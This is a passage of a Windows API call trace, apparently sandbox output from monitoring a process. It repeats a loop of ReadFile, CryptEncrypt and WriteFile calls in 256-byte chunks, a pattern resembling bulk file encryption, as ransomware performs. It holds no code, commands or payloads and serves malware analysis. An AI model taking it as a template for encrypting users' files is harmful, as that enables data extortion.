lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.244] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.245] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.245] GetLastError () returned 0x0 [0167.245] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.245] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.245] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.245] GetLastError () returned 0x0 [0167.245] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.245] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.245] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.245] GetLastError () returned 0x0 [0167.245] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.245] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.245] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.245] GetLastError () returned 0x0 [0167.245] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.245] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.245] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.245] GetLastError () returned 0x0 [0167.245] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.245] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.245] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.245] GetLastError () returned 0x0 [0167.245] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.245] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.245] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.246] GetLastError () returned 0x0 [0167.246] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.246] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.246] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.246] GetLastError () returned 0x0 [0167.246] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.246] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.246] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.246] GetLastError () returned 0x0 [0167.246] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.246] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.246] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.246] GetLastError () returned 0x0 [0167.246] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.246] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.246] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.246] GetLastError () returned 0x0 [0167.246] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.246] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.246] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.246] GetLastError () returned 0x0 [0167.246] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.246] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.246] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.246] GetLastError () returned 0x0 [0167.246] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.247] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.247] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.247] GetLastError () returned 0x0 [0167.247] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.247] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.247] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.247] GetLastError () returned 0x0 [0167.247] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.247] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.247] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.247] GetLastError () returned 0x0 [0167.247] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.247] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.247] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.247] GetLastError () returned 0x0 [0167.247] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.247] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.247] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.247] GetLastError () returned 0x0 [0167.247] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.247] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.247] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.247] GetLastError () returned 0x0 [0167.247] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.247] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.248] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.248] GetLastError () returned 0x0 [0167.248] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.248] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.248] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.248] GetLastError () returned 0x0 [0167.248] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.248] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.248] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.248] GetLastError () returned 0x0 [0167.248] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.248] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.248] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.248] GetLastError () returned 0x0 [0167.248] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.248] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.248] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.248] GetLastError () returned 0x0 [0167.248] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.248] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.248] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.248] GetLastError () returned 0x0 [0167.248] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.248] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.248] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.248] GetLastError () returned 0x0 [0167.248] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.249] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.249] GetLastError () returned 0x0 [0167.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.249] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.249] GetLastError () returned 0x0 [0167.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.249] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.249] GetLastError () returned 0x0 [0167.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.249] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.249] GetLastError () returned 0x0 [0167.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.249] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.249] GetLastError () returned 0x0 [0167.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.249] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.249] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.249] GetLastError () returned 0x0 [0167.249] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 